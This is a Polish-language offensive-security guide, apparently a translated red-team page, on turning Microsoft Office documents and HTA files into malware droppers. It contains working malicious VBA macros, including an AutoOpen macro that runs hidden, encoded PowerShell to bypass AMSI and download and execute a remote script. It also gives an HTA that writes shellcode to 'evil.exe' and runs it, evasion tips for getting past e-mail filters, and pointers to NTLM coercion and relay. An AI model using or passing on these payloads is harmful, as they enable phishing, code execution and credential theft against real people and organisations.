Dokumenty Biurowe

Microsoft Word wykonuje walidację danych pliku przed otwarciem. Walidacja danych odbywa się w formie identyfikacji struktury danych, zgodnie ze standardem OfficeOpenXML. Jeśli wystąpi błąd podczas identyfikacji struktury danych, analizowany plik nie zostanie otwarty.

Zazwyczaj pliki Word zawierające makra używają rozszerzenia .docm. Jednakże, możliwe jest zmienienie nazwy pliku poprzez zmianę rozszerzenia i zachowanie zdolności do wykonywania makr. Na przykład plik RTF nie obsługuje makr, z założenia, ale plik DOCM zmieniony na RTF zostanie obsłużony przez Microsoft Word i będzie zdolny do wykonania makr. Te same wewnętrzne mechanizmy stosuje się do wszystkich programów z pakietu Microsoft Office (Excel, PowerPoint itp.).

Możesz użyć poniższej komendy, aby sprawdzić, które rozszerzenia będą wykonywane przez niektóre programy biurowe:

assoc | findstr /i "word excel powerp"

Ładowanie zewnętrznego obrazu

Przejdź do: Wstaw --> Szybkie części --> Pole Kategorie: Linki i odwołania, Nazwy pól: includePicture, a Nazwa pliku lub adres URL: http://<ip>/cokolwiek

Tylnie drzwi makr

Możliwe jest użycie makr do uruchamiania dowolnego kodu z dokumentu.

Funkcje automatycznego ładowania

Im bardziej popularne, tym bardziej prawdopodobne jest wykrycie ich przez oprogramowanie antywirusowe.

• AutoOpen()

• Document_Open()

Przykłady kodu makr

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Usunięcie metadanych ręcznie

Przejdź do Plik > Informacje > Sprawdź dokument > Sprawdź dokument, co spowoduje otwarcie Inspektora dokumentów. Kliknij Sprawdź a następnie Usuń wszystko obok Właściwości dokumentu i informacji osobistych.

Rozszerzenie dokumentu

Po zakończeniu wybierz rozwijaną listę Zapisz jako typ, zmień format z .docx na Word 97-2003 .doc. Zrób to, ponieważ nie można zapisać makr wewnątrz pliku .docx i istnieje stygmat wokół rozszerzenia z makrami .docm (np. ikona miniatury ma duże ! i niektóre bramy internetowe/e-mail blokują je całkowicie). Dlatego to dziedziczone rozszerzenie .doc jest najlepszym kompromisem.

Generatory złośliwych makr

• MacOS

• macphish

• Mythic Macro Generator

Pliki HTA

HTA to program Windows, który łączy HTML i języki skryptowe (takie jak VBScript i JScript). Generuje interfejs użytkownika i wykonuje się jako aplikacja "w pełni zaufana", bez ograniczeń modelu bezpieczeństwa przeglądarki.

HTA jest wykonywany za pomocą mshta.exe, który zazwyczaj jest zainstalowany razem z Internet Explorer, co sprawia, że mshta zależy od IE. Jeśli został odinstalowany, pliki HTA nie będą mogły być wykonane.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

Wymuszanie uwierzytelniania NTLM

Istnieje kilka sposobów wymuszenia uwierzytelniania NTLM "zdalnie", na przykład można dodać niewidoczne obrazy do e-maili lub HTML, do których użytkownik uzyska dostęp (nawet HTTP MitM?). Lub wysłać ofierze adres plików, które spowodują uwierzytelnienie tylko po otwarciu folderu.

Sprawdź te pomysły i więcej na następnych stronach:

Przekazywanie NTLM

Nie zapomnij, że możesz nie tylko ukraść skrót lub uwierzytelnienie, ale także przeprowadzić ataki przekazywania NTLM:

• Ataki przekazywania NTLM

• AD CS ESC8 (przekazywanie NTLM do certyfikatów)